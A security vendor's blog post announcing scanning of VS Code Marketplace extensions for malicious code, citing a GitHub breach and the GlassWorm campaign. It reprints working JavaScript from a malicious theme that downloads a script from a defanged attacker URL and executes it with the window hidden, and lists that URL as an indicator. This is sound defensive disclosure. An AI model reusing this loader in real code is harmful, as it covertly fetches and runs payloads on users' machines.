Back to Feed
Supply ChainOct 6, 2026

Introducing Socket Scanning for VS Code Marketplace Extensions

Socket launches experimental scanning for VS Code Marketplace extensions to detect malicious code.

Summary

Socket has introduced experimental support for scanning VS Code Marketplace extensions, aiming to identify malicious code and risky behaviors before developers adopt them. This initiative addresses the growing threat of compromised developer tools, highlighted by incidents like the GitHub breach involving a malicious VS Code extension. The new feature extends Socket's security analysis to over 100,000 extensions, helping teams evaluate the security of their development toolchain.

Full text

BackProductIntroducing Socket Scanning for VS Code Marketplace ExtensionsSocket now scans VS Code extensions, giving teams early detection of risky behaviors, hidden capabilities, and supply chain threats in developer tools.John TucknerOct 6, 2026|3 min readIf 2026 has shown us anything, it’s that the software supply chain doesn’t stop at the dependencies in your apps. It includes the tools your developers use to write, build, and ship code.VS Code extensions run inside an environment full of source code, credentials, and access to company infrastructure. A malicious extension can put all of that within an attacker’s reach.Today, we’re launching experimental support for scanning VS Code Marketplace extensions. This extends our proactive security analysis to the tools developers install in their editors, helping teams identify malicious code and risky behaviors before adopting an extension.Socket now scans VS Code Marketplace’s 100,000+ extensions, alongside our existing Open VSX coverage. Teams can use Socket to evaluate the developer tools they rely on across both registries.A Single Extension Can Expose an Organization#In May, GitHub disclosed a breach that began with a malicious update to Nx Console, a legitimate VS Code extension, on an employee’s device. Attackers exfiltrated internal repositories, with GitHub reporting that the attacker’s claim of approximately 3,800 repositories was consistent with its investigation. One poisoned update on one employee’s machine was enough for attackers to steal thousands of GitHub’s internal repositories. Even if an extension has been vetted and allowlisted, a later update can introduce malicious code.A poisoned update runs with the same access as the legitimate extension it replaces. Extensions can read and write files, make network requests, and launch external processes. Those capabilities support useful development tools, but they can also give attackers the keys to the kingdom.Automatic extension updates push new code onto developers’ machines, yet developers have little visibility into what changed. An extension that was safe when installed can get weaponized to be malicious in a later update, even while the name and publisher remain the same. For example, color themes may look harmless, but attackers are counting on the fact that most developers don’t look closely at the extensions they install or update. In our recent GlassWorm investigation, Socket’s threat research team uncovered a cluster spanning four VS Code Marketplace extensions and six Open VSX extensions, including two confirmed malicious extensions. Related themes had thousands of installs. One malicious theme used encrypted JavaScript and a Solana dead drop to locate and execute additional payloads.Does this look like the code you’d need to bring the beauty of the northern lights into your editor? Nice of them to hide the command window. Wouldn’t want it spoiling the view.JavaScriptconst https = require('https'); const fs = require('fs'); const os = require('os'); const path = require('path'); const { exec } = require('child_process'); // Download threat actor-controlled content https.get('hxxps://fingercakes4sale[.]store/dsyuC', (response) => { // Save the response as a Windows command script const file = fs.createWriteStream( path.join(os.tmpdir(), 'temp_batch.cmd') ); response.pipe(file); file.on('finish', () => { file.close(); // Execute the downloaded script and suppress the command window exec( `cmd /c "${path.join(os.tmpdir(), 'temp_batch.cmd')}"`, { windowsHide: true } ); }); });The VS Code Marketplace team removed the reported extensions shortly after receiving our report, but this investigation shows how important it is to vet extensions yourself before installing them. Even with marketplace screening, malicious extensions can slip through. Identify Extensions Linked to Malicious Campaigns#Socket’s coverage also helps teams identify when an extension is connected to a larger malicious campaign. Code reuse, shared infrastructure, and publishing patterns can reveal connections that are easy to miss when reviewing an extension on its own.In our GlassWorm investigation, those connections helped us identify additional high-risk themes linked to confirmed malicious extensions, including themes whose analyzed versions did not contain active malicious payloads. These extensions retained functionality that could be weaponized in future updates.Bring Extension Security Into Your Software Review#Socket helps teams evaluate what an extension can do and identify behavior that warrants further investigation. Our extension analysis examines code, activation patterns, dependencies, and capabilities, including:File system access that could expose source code, credentials, or configuration.Network activity that could transmit sensitive data or retrieve additional payloads.Process execution and bundled executables that extend an extension’s reach beyond the editor.Obfuscated code and hidden functionality that make malicious behavior harder to spot.Activation behavior that determines when executable code runs.This gives security and engineering teams more evidence when reviewing extensions for use across their organization. Developers can keep the tools that make them productive, while security teams can assess the software running alongside their code.VS Code Extension Scanning Is Available Today#VS Code Marketplace scanning is available today in experimental, and we’re inviting teams to try it and help shape the feature.To request access, contact sales@socket.dev or reach out to your Socket customer success manager. We’ll help you get started evaluating the extensions your team uses.

Indicators of Compromise

  • url — hxxps://fingercakes4sale[.]store/dsyuC

Entities

VS Code (product)Nx Console (product)Socket (vendor)GitHub (vendor)GlassWorm (campaign)